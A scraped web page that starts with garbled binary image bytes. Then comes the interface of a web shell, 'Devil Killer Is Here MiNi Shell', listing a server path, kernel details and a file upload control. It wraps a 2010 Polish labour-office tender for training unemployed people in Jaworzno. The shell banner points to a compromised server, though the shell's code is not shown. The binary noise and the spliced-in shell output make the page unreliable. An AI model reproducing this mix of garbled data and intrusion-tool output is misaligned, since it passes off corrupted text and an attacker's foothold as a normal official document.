JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100614/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100614/152407-N-2010.html

<p class="kh_header"><b>Jaworzno: 1.Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie grupowych szkoleń osób bezrobotnych</b><br>
<b>Numer ogłoszenia: 152407 - 2010; data zamieszczenia: 14.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Jaworznie , ul. Północna 9B, 43-600 Jaworzno, woj. śląskie, tel. 032 6181924, faks 032 6181901.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupjaworzno.internetdsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1.Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie grupowych szkoleń osób bezrobotnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie grupowych szkoleń osób bezrobotnych w następujących zakresach:
I. Zakres Pracownik ochrony fizycznej I stopnia
Ilość osób:  6 w I edycji.
Czas realizacji: nie dłużej niż 8 tygodni. 
Program szkolenia: Szkolenie ma przygotować uczestników do egzaminu na uzyskanie licencji pracownika ochrony fizycznej I stopnia oraz do pracy w zawodzie pracownika ochrony. Powinno być zgodne z przepisami ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia (tekst jednolity: Dz. U. z 2005r. Nr 145 poz. 1221  z późn. zm.) oraz przeprowadzone w oparciu o program opracowany na podstawie Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 7 sierpnia 1998r. w sprawie rodzajów dyplomów i świadectw wydanych przez szkoły i inne placówki oświatowe, które potwierdzają uzyskanie specjalistycznych kwalifikacji  w zakresie ochrony osób i mienia, minimalnego zakresu programów kursów pracowników ochrony fizycznej pierwszego i drugiego stopnia oraz zakresu obowiązujących tematów egzaminów i trybu ich składania, składu komisji egzaminacyjnej i sposobu przeprowadzania egzaminu (Dz. U. Nr 113 poz. 731).

II.  Zakres Operator koparko - ładowarki wszystkie typy klasa III
Ilość osób:10 w I edycji.
Czas realizacji: nie dłużej niż 7 tygodni. 
Program szkolenia: minimalna ilość godzin szkolenia - 202 godziny. Szkolenie powinno  być zorganizowane zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118 poz. 1263), przeprowadzone w oparciu o program zatwierdzony przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie. 
Dodatkowe wymagania: Każdy uczestnik szkolenia powinien otrzymać świadectwo oraz uzyskać wpis do książki operatora wydane przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie.

III. Zakres  Szkolenie kierowców wykonujących przewóz drogowy - szkolenie w ramach kwalifikacji wstępnej przyśpieszonej w zakresie prawa jazdy kat. C lub kat. D
Ilość osób: 10 (zamawiający będzie kierował osoby bezrobotne na szkolenie indywidualnie lub grupowo w zależności od potrzeb). 
Czas realizacji: nie dłużej niż 4 tygodnie. 
Program szkolenia: Programy szkolenia winny być zgodne z obowiązującymi przepisami prawa tj. Ustawą z dnia 06 września 2001r. - o transporcie drogowym (tekst jednolity: Dz. U. z 2007r. Nr 125 poz. 874 z późn. zm.) oraz Rozporządzeniem Ministra Infrastruktury z dnia 2 lipca 2008r. w sprawie szkolenia kierowców wykonujących przewóz drogowy (Dz. U. Nr 124, poz. 805 z późn. zm.) 
Osoba skierowana na szkolenie może uzyskać jeden rodzaj kwalifikacji.
Dodatkowe wymagania: Uczestnik szkolenia otrzyma zaświadczenie zgodnie z ww. rozporządzeniem.
IV. Zakres  Prawo jazdy kat. B 
Ilość osób:  12 (zamawiający będzie kierował osoby bezrobotne na szkolenie indywidualnie lub grupowo w zależności od potrzeb).
Czas realizacji: nie dłużej niż 8 tygodni. 
Program szkolenia:  Program szkolenia musi być zgodny z obowiązującymi przepisami prawa tj. Ustawą z dnia 20 czerwca 1997r. - Prawo o ruchu drogowym (tekst jednolity: Dz. U. z 2005r. Nr 108 poz. 908 z późn. zm.) oraz  rozporządzeniem  Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami,  instruktorów i egzaminatorów (Dz. U. Nr 217 poz. 1834 z późn. zm.). Dodatkowe wymagania: Uczestnik szkolenia otrzyma zaświadczenie zgodnie z ww. rozporządzeniem

V.  Zakres Sprzedawca
Ilość osób:  10  w I edycji.
Czas realizacji: nie dłużej niż 3 tygodnie 
Program szkolenia: minimalna ilość godzin - 120, w tym minimum 70 godzin ćwiczeń.
1. modułowy program szkolenia zawodowego dla zawodu: sprzedawca, z zakresu: pracownik działu sprzedaży (kod zawodu: 522107) z następującymi jednostkami modułowymi: 
1)przestrzeganie zasad bezpieczeństwa i higieny pracy w jednostce handlowej - minimum 3 godziny,
2)organizacja handlu w gospodarce rynkowej - minimum 14 godzin,
3)wyposażenie punktu sprzedaży detalicznej - minimum 10 godzin,
4)organizacja zaopatrzenia i przyjmowanie dostaw towarów - minimum 14 godzin,
5)wykonywanie i dokumentowanie podstawowych obliczeń sklepowych - minimum  18 godzin,
6)obsługiwanie klienta, przebieg sprzedaży detalicznej- minimum 12 godzin.
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie     z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl. 
2. jednostkę modułową: obsługa kasy fiskalnej - minimum  10 godzin,
3. jednostkę modułową: fakturowanie komputerowe- minimum 14 godzin,
4. jednostkę modułową: podstawowe zasady higieny- minimum 10 godzin,
5. jednostkę modułową: obsługa programu SUBIEKT dla WINDOWS do prowadzenia gospodarki magazynowej- 
    minimum 15 godzin.

VI.  Zakres Księgowość z zastosowaniem komputera
Ilość osób:  10 w I edycji.
Czas realizacji: nie dłużej niż 9 tygodni. 
Program szkolenia: minimalna ilość godzin - 270, w tym minimum 220 godzin ćwiczeń.
Program szkolenia musi zawierać:
1.modułowy program szkolenia zawodowego dla zawodu: księgowy (samodzielny), z zakresu:  księgowy bilansista (kod zawodu: 343201) z następującymi jednostkami modułowymi: 
1) ogólne zasady rachunkowości,
2) środki gospodarcze i źródła ich pochodzenia,
3) ewidencja operacji gospodarczych,
4) organizacja rachunkowości w jednostkach gospodarczych,
5) ogólne zasady inwentaryzacji,
6) ewidencja obrotu gotówkowego,
7) ewidencja obrotu bezgotówkowego,
8) ewidencja innych środków pieniężnych,
9) sporządzanie list płac i rozdzielników,
10)   sporządzanie list zasiłków i deklaracji ZUS
11)   rozliczanie podatku dochodowego od osób fizycznych,
12)   ewidencja rozrachunków z tytułu VAT,
13)   ewidencja rozrachunków z dostawcami,
14)   ewidencja rozrachunków z odbiorcami,
15)   ewidencja rozrachunków z pracownikami,
16)   ewidencja rozrachunków publiczno - prawnych,
17)   ewidencja pozostałych rozrachunków,
18)   ewidencja roszczeń,
19)   ewidencja roszczeń barterowych,
20)   ewidencja inwestycji,
21)   ewidencja środków trwałych,
22)   ewidencja finansowego majątku trwałego,
23)   ewidencja wartości niematerialnych i prawnych,
24)   ewidencja leasingu,
25)   ewidencja i rozliczanie zakupu towarów i opakowań,
26)   ewidencja zakupu usług,
27)   ewidencja i rozliczanie zakupu materiałów,
28)   ewidencja zużycia materiałów,
29)   rozliczenie kosztów handlowych,
30)   ewidencja i rozliczenie kosztów przedsiębiorstwa,
31)   kalkulacja kosztu jednostkowego produktu,
32)   ewidencja wyrobów gotowych,
33)   ewidencja sprzedaży towarów,
34)   ewidencja sprzedaży usług,
35)   ewidencja sprzedaży wyrobów gotowych,
36)   ustalenie wyniku finansowego,
37)   ewidencja wyniku finansowego,
38)   podział wyniku finansowego,
39)   ewidencja funduszy i kapitałów własnych,
40)   ewidencja funduszy specjalnych,
41)   sporządzanie sprawozdań,
42)   sporządzanie bilansu,
43)   sporządzanie sprawozdań z przepływu środków pieniężnych,
44)   sporządzanie rachunku zysków i strat,
45)   analiza podstawowych wskaźników finansowych,
46)   obsługa komputera w zakresie podstawowym,
47)   arkusze kalkulacyjne w zastosowaniach  finansowo- księgowych,
48)   obsługa programów płacowych,
49)   obsługa programów finansowo- księgowych
-- suma godzin dla jednostek modułowych 46,47,48,49 - minimum 50 godzin
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie   z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl.
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie z zakresem szkolenia. 

VII.  Zakres Pracownik administracyjno - biurowy
Ilość osób: 15 osób w I edycji.
Czas realizacji: nie dłużej niż 3 tygodnie. 
Program szkolenia:  minimalna ilość godzin- 120, w tym 70 godzin ćwiczeń.
Program szkolenia powinien być dostosowany do standardów kwalifikacji zawodowych dla zawodu: pracownik administracyjny (kod zawodu: 343401) i pracownik biurowy (kod zawodu:419101) oraz musi zawierać następujące jednostki modułowe: 
1)organizowanie pracy własnej zgodnie z zasadami ergonomii, bezpieczeństwa i higieny pracy oraz ochrony  przeciwpożarowej i ochrony środowiska  i zarzadzanie w jednoste organizacyjnej,
2)organizowanie pracy własnej na stanowisku technika administracji, usprawnianie pracy oraz doskonalenie osobistych kompetencji,
3)organizowanie spotkań służbowych, z kontrahentami, pracownikami i klientami oraz innych prac związanych z funkcjonowaniem przedsiębiorstwa,
4)przyjmowanie i obsługiwanie interesantów,
5)wykonywanie prac admninistracyjnych związanych z ogólną działalnością jednostki organizacyjnej,
6)zapewnianie przepływu informacji i dokumentów wewnątrz i na zewnątrz organizacji,
7)sporządzanie dokumentacji prawnej oraz dokumentacji spraw pracowniczych związanej z działalnością jednostki organizacyjnej zgodnie z przyjętym systemem kancelaryjnym,
8)przygotowanie i udostępnianie dokumentacji do kontroli,
9)redagowanie korespondencji biurowej w języku polskim,
10)sporządzanie umów, dokumentacji spraw kancelaryjno - biurowych, pracowniczej oraz finansowej związanej z działalnością jednostki gospodarczej,
11)przechowywanie i archiwizowanie informacji, dokumentów oraz akt spraw,
12)gromadzernie i wykorzystywanie informacji ekonomicznych i statystycznych w pracy pracownika administracyjnego,
13)tworzenie i prowadzenie bazy danych kontrahentów,
14)stosowanie przepisów prawa w pracy zawodowej,
15)wykonywanie prac biurowych,
16)współpraca z innymi komórkami organizacyjnymi jednostki,
17)współpraca z otoczeniem zewnętrznym jednostki organizacyjnej ,
18)kierowanie zespołem pracowników administracyjno-biurowych,
19)ocenianie jakości i efektywności własnych działań zawodowych,
20)obsługa urządzeń biurowych,
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie z zakresem szkolenia.

VIII.  Zakres Manicure - pedicure, stylizacja paznokci
Ilość osób: 5 osób w I edycji.
Czas realizacji: nie dłużej niż 7 tygodni. 
Program szkolenia:  minimalna ilość godzin- 210, w tym 150 godzin zajęć praktycznych na stanowisku pracy lub w innym miejscu umożliwiającym nabycie przez kursantów umiejętności praktycznych. 
Program szkolenia musi zawierać:
1.modułowy program szkolenia zawodowego dla zawodu: kosmetyczka (kod zawodu: 514103),
z następującymi jednostkami modułowymi:
1) pielęgnowanie dłoni, manicure, 
2) pielęgnowanie stóp, pedicure, 
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl.
2.jednostkę modułową: stylizacja paznokci metodą żelową, 
3.jednostke modułową: stylizacja paznokci metodą akrylową, 
4.jednostkę modułową: zdobnictwo paznokci  (w tym nakładanie tipsów, malowanie paznokci) 
5.jednostkę modułową: nauka o kolorach i elementy stylizacji
6.jednostkę modułową: zakładanie i prowadzenie własnej działalnosci gospodarczej - minimum 10 godzin

UWAGA! Podane ilości godzin szkolenia oznaczają godziny zegarowe! Godzina zegarowa  kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę, liczącą średnio 15 minut. Długość przerw może być ustalana w sposób elastyczny. Powyższy zapis nie dotyczy zakresu III i IV. 

3.1.Dodatkowe wymagania związane z przedmiotem zamówienia.
3.1.1. Szkolenia muszą zostać przeprowadzone na terenie miasta Jaworzna lub miast ościennych, do których można dojechać jednym środkiem transportu komunikacji publicznej. Przez miasto ościenne należy rozumieć miasto graniczące z Jaworznem.
3.1.2.    W ramach realizacji szkoleń Wykonawca zapewni: 
Odpowiednie warunki lokalowe /sale wykładowe, sale ćwiczeń, ze wskazaniem pełnego adresu miejsca odbywania zajęć/.
Warunki zgodne z przepisami bezpieczeństwa i higieny pracy.
Materiały biurowe /zeszyt, notatnik, długopis/.
Materiały dydaktyczne i pomoce naukowe, niezbędne do prawidłowego przebiegu szkolenia i przygotowania do egzaminu końcowego.
Serwis kawowy (bez ograniczeń- kawa, herbata lub napój do wyboru. Słodka bułka i kanapka po jednej sztuce dla każdego uczestnika szkolenia na każdy dzień).
Zaplecze sanitarne i higieniczne oraz środki czystości;
Odzież ochronną (roboczą), jeżeli kierunek szkolenia tego wymaga.
3.1.3. Szkolenia muszą zostać zrealizowane zgodnie z następującymi zasadami:
1)plan nauczania musi obejmować przeciętnie nie mniej niż 30 godzin w tygodniu. 
2)zajęcia muszą odbywać się od poniedziałku do piątku, nie więcej niż 8 godzin dziennie.
W szczególnie uzasadnionych przypadkach, po pisemnym uzgodnieniu z Zamawiającym, dopuszcza się możliwość  organizacji szkolenia w sobotę. 
3)harmonogram szkolenia musi uwzględniać wymagania, o których mowa w pkt 1 i pkt 2 oraz musi zostać opracowany w taki sposób, aby było możliwe dokonanie kontroli realizacji szkolenia do godziny 15.00 przez pracownika Urzędu Pracy.
Warunki pkt 1 i 2 nie dotyczą zakresu III i IV.
3.1.4.	Zaświadczenia winny być wydane uczestnikom szkolenia w języku polskim. 
3.1.5.	Zaświadczenia o ukończonym szkoleniu powinny być zgodne z rozporządzeniem Ministra Edukacji 
i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr  31 poz. 216) oraz z innymi obowiązującymi przepisami prawa w przypadku realizacji szkolenia regulowanego odrębnymi przepisami.
3.1.6.	Szkolenia powinny mieć charakter wykładów i ćwiczeń lub praktyk oraz zakończyć się egzaminem                    z zakresu materiału objętego programem szkolenia.
3.1.7.	Wykonawca jest zobowiązany do posiadania pomieszczeń dostosowanych do prowadzenia zajęć dla całej grupy skierowanych bezrobotnych, posiadać odpowiednią ilości sprzętu zapewniającą każdej skierowanej osobie możliwość wykorzystania go w trakcie szkolenia, posiadać nowoczesne pomoce dydaktyczne podnoszące atrakcyjność i skuteczność prowadzonych szkoleń, zapewnić odpowiednie zaplecze socjalne (dostęp do toalety, bieżącej wody, miejsca spożywania posiłku).
	Wykonawca w sposób jednoznaczny i czytelny powinien opisać spełnienie powyższego warunku
w Kwestionariuszu Szkolenia oraz Programie Szkolenia. 
3.1.8.	Wykonawca jest zobowiązany do prowadzenia nadzoru wewnętrznego służącego podnoszeniu jakości realizowanych szkoleń poprzez wyznaczenie kierownika kursu lub innej osoby nadzorującej realizację szkolenia, która m.in. dokona przynajmniej jednej wizyty hospitacyjnej szkolenia oraz będzie prowadzić bieżący monitoring frekwencji uczestników szkolenia, a także badania jakości szkolenia oraz osób prowadzących zajęcia poprzez ocenę dokonaną przez uczestników szkolenia za pomocą ankiety.
	Wykonawca w sposób jednoznaczny i czytelny powienien opisać spełnienie powyższego warunku
w Kwestionariuszu Instytucji Szkoleniowej. 
3.1.9.	Wykonawca jest zobowiązany do sprawdzania efektów szkolenia poprzez przeprowadzanie sprawdzianów okresowych, a na zakończenie szkolenia egzaminu wewnętrznego służącego ocenie stopnia opanowania przez uczestników szkolenia przekazywanej wiedzy i umiejętności lub egzaminy zewnętrzne - państwowe wymagane odrębnymi przepisami prawa 
	Wykonawca w sposób jednoznaczny i czytelny powienien opisać spełnienie powyższego warunku
w Kwestionariuszu Instytucji Szkoleniowej. 
3.2. Zamawiający zastrzega sobie prawo kontroli jednostki szkoleniowej w zakresie zapewnienia odpowiednich warunków lokalowych przed rozstrzygnięciem postępowania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wymagane jest by Wykonawca wykazał, że posiada aktualny wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę Wykonawcy - zgodnie z rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji  szkoleniowych /Dz. U. Nr 236 poz. 2365/.
 Ocena spełnienia warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa w rozdziale 6 ust.3 Pkt 3.1 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wymagane jest by Wykonawca wykazał, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał co najmniej trzy usługi, a w przypadku zakresu III jedną usługę, odpowiadające swoim rodzajem przedmiotowi zamówienia.  
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów
i oświadczeń, o których mowa w rozdziale 6 ust.4 Pkt 4.1-4.3 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia, Wykonawca wyznaczy do realizacji przedmiotu zamówienia kadrę wykładowczą, spełniającą następujące warunki:
1)osoby prowadzące zajęcia teoretyczne muszą posiadać wykształcenie wyższe związane z kierunkiem szkolenia lub wykształcenie wyższe oraz minimum 5 letnie doświadczenie zawodowe z zakresu objętego szkoleniem; 
2)osoby prowadządze ćwiczenia oraz zajęcia praktyczne muszą posiadać wykształcenie minimum średnie związane z kierunkiem szkolenia lub wykształcenie średnie oraz minimum 5 letnie doświadczenie zawodowe z zakresu objętego szkoleniem;
3)każda z osób prowadzących zajęcia musi posiadać co najmniej 2 letnie doświadczenie zawodowe w prowadzeniu zajęć zgodnych z kierunkiem szkolenia;
4)każda z osób prowadzących zajęcia musi posiadać uprawnienia pedagogiczne lub co najmniej 2 letnie doświadczenie zawodowe w prowadzeniu zajęć dydaktycznych.
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w rozdziale 6  ust.5  pkt 5.1-5.2 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

